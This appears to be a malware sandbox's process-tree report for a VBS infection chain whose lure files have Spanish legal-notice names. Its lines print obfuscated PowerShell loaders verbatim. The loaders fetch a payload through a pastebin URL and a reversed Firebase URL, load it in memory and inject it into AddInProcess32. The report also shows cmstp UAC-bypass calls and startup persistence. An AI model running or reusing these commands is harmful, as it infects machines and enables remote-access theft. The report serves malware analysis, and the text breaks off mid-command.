- System Location Discovery: System Language Discovery
PID:4972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bu☆GE☆b☆Bl☆G0☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆GU☆awBo☆HU☆a☆☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆aQBy☆GQ☆awB0☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆aQBy☆GQ☆awB0☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GI☆OQ☆1☆DY☆MQ☆3☆GQ☆MgBm☆GE☆Mw☆t☆Dk☆Zg☆0☆GI☆LQ☆w☆DE☆Yg☆0☆C0☆ZQ☆3☆DE☆Yw☆t☆Dc☆MwBk☆Dg☆M☆Bl☆DY☆Zg☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆OQ☆w☆C0☆O☆☆x☆G4☆eQBz☆GE☆LwBv☆C8☆bQBv☆GM☆LgB0☆G8☆c☆Bz☆H☆☆c☆Bh☆C4☆YwBv☆GQ☆LQBl☆HI☆YgBt☆GU☆aQB2☆G8☆bg☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆GU☆awBo☆HU☆a☆☆g☆Cw☆I☆☆n☆H☆☆dgBk☆GE☆cw☆n☆Cw☆I☆☆k☆G4☆YQBs☆GU☆bQ☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs');powershell $KByHL;
9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nalem = '0';$ekhuh = 'C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $irdkt = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($irdkt).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0b95617d2fa3-9f4b-01b4-e71c-73d80e6f=nekot&aidem=tla?txt.4202-90-81nysa/o/moc.topsppa.cod-erbmeivon/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $ekhuh , 'pvdas', $nalem, '1', 'Roda' ));"
10⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6024

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
11⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f
12⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4248

C:\Windows\SysWOW64\cmstp.exe
"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\kfgsxdbc.inf
12⤵
- System Location Discovery: System Language Discovery
PID:5852

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f
12⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4680

C:\Windows\SysWOW64\cmstp.exe
"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\4ias0hcg.inf
12⤵
- System Location Discovery: System Language Discovery
PID:5520

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f
12⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3580

C:\Windows\SysWOW64\cmstp.exe
"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\kipuvain.inf
12⤵
- System Location Discovery: System Language Discovery
PID:1032

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs"' & exit
6⤵
- System Location Discovery: System Language Discovery
PID:5276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs"'
7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5220

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs"
8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bm☆HE☆dgBk☆HI☆I☆☆9☆C☆☆Jw☆w☆DM☆Jw☆7☆CQ☆d☆Bp☆G8☆dQBw☆C☆☆PQ☆g☆Cc☆JQBw☆Ho☆QQBj☆E8☆ZwBJ☆G4☆TQBy☆CU☆Jw☆7☆Fs☆UwB5☆HM☆d☆Bl☆G0☆LgBO☆GU☆d☆☆u☆FM☆ZQBy☆HY☆aQBj☆GU☆U☆Bv☆Gk☆bgB0☆E0☆YQBu☆GE☆ZwBl☆HI☆XQ☆6☆Do☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆☆g☆D0☆I☆Bb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆YwB1☆HI☆aQB0☆Hk☆U☆By☆G8☆d☆Bv☆GM☆bwBs☆FQ☆eQBw☆GU☆XQ☆6☆Do☆V☆Bs☆HM☆MQ☆y☆Ds☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆9☆C☆☆JwBo☆HQ☆d☆Bw☆HM☆Og☆v☆C8☆c☆Bh☆HM☆d☆Bl☆GI☆aQBu☆C4☆YwBv☆G0☆LwBy☆GE☆dw☆v☆EE☆Z☆B2☆Dk☆ZwBC☆Eg☆YQ☆n☆Ds☆J☆BJ☆Eg☆c☆BM☆HE☆I☆☆9☆C☆☆K☆BO☆GU☆dw☆t☆E8☆YgBq☆GU☆YwB0☆C☆☆TgBl☆HQ☆LgBX☆GU☆YgBD☆Gw☆aQBl☆G4☆d☆☆p☆C4☆R☆Bv☆Hc☆bgBs☆G8☆YQBk☆FM☆d☆By☆Gk☆bgBn☆Cg☆I☆☆k☆F☆☆e☆BF☆Ew☆W☆☆g☆C☆☆KQ☆7☆CQ☆UgBD☆Gs☆VgBK☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BJ☆Eg☆c☆BM☆HE☆I☆☆p☆C4☆cgBl☆H☆☆b☆Bh☆GM☆ZQ☆o☆Cc☆J☆☆l☆Cc☆L☆☆n☆EE☆Jw☆p☆Ds☆WwBC☆Hk☆d☆Bl☆Fs☆XQBd☆C☆☆J☆Bl☆G4☆YgB4☆Go☆I☆☆9☆C☆☆WwBz☆Hk☆cwB0☆GU☆bQ☆u☆EM☆bwBu☆HY☆ZQBy☆HQ☆XQ☆6☆Do☆RgBy☆G8☆bQBC☆GE☆cwBl☆DY☆N☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BS☆EM☆awBW☆Eo☆I☆☆p☆Ds☆WwBz☆Hk☆cwB0☆GU☆bQ☆u☆EE☆c☆Bw☆EQ☆bwBt☆GE☆aQBu☆F0☆Og☆6☆EM☆dQBy☆HI☆ZQBu☆HQ☆R☆Bv☆G0☆YQBp☆G4☆LgBM☆G8☆YQBk☆Cg☆J☆Bl☆G4☆YgB4☆Go☆KQ☆u☆Ec☆ZQB0☆FQ☆eQBw☆GU☆K☆☆n☆FQ☆ZQBo☆HU☆b☆Bj☆Gg☆ZQBz☆Fg☆e☆BY☆Hg☆e☆☆u☆EM☆b☆Bh☆HM☆cw☆x☆Cc☆KQ☆u☆Ec☆ZQB0☆E0☆ZQB0☆Gg☆bwBk☆Cg☆JwBN☆HM☆cQBC☆Ek☆YgBZ☆Cc☆KQ☆u☆Ek☆bgB2☆G8☆awBl☆Cg☆J☆Bu☆HU☆b☆Bs☆Cw☆I☆Bb☆G8☆YgBq☆GU☆YwB0☆Fs☆XQBd☆C☆☆K☆☆n☆GM☆ZQ☆0☆DY☆OQ☆x☆DQ☆Zg☆1☆DI☆Mw☆0☆C0☆N☆☆y☆GY☆O☆☆t☆DQ☆ZQ☆4☆DQ☆LQ☆4☆DE☆ZQ☆z☆C0☆Nw☆4☆GU☆ZQ☆1☆Dg☆Z☆Bl☆D0☆bgBl☆Gs☆bwB0☆CY☆YQBp☆GQ☆ZQBt☆D0☆d☆Bs☆GE☆PwB0☆Hg☆d☆☆u☆G8☆d☆Bz☆G8☆ZwBh☆Gw☆dQB6☆GE☆LwBv☆C8☆bQBv☆GM☆LgB0☆G8☆c☆Bz☆H☆☆c☆Bh☆C4☆bwBj☆Gk☆bgBv☆HI☆d☆Bj☆GU☆b☆Bl☆C0☆bwB0☆G4☆ZQBt☆HU☆YwBv☆GQ☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B0☆Gk☆bwB1☆H☆☆I☆☆s☆C☆☆JwBf☆F8☆XwBf☆GI☆agB3☆HE☆b☆Bf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bm☆HE☆dgBk☆HI☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs');powershell $KByHL;
9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$fqvdr = '03';$tioup = 'C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $enbxj = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($enbxj).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('ce46914f5234-42f8-4e84-81e3-78ee58de=nekot&aidem=tla?txt.otsogaluza/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $tioup , '____bjwql________________________________________-------', $fqvdr, '1', 'Roda' ));"
10⤵
- Blocklisted process makes network request
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\0016NOTIFICACION_DE_DEMANDA161020241127.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
11⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
11⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5864 /prefetch:2
2⤵
PID:3208

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2180

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2840

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5364

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
1⤵
- Checks computer location settings
PID:5716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5920

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:6068

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
1⤵
- Checks computer location settings
PID:5144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv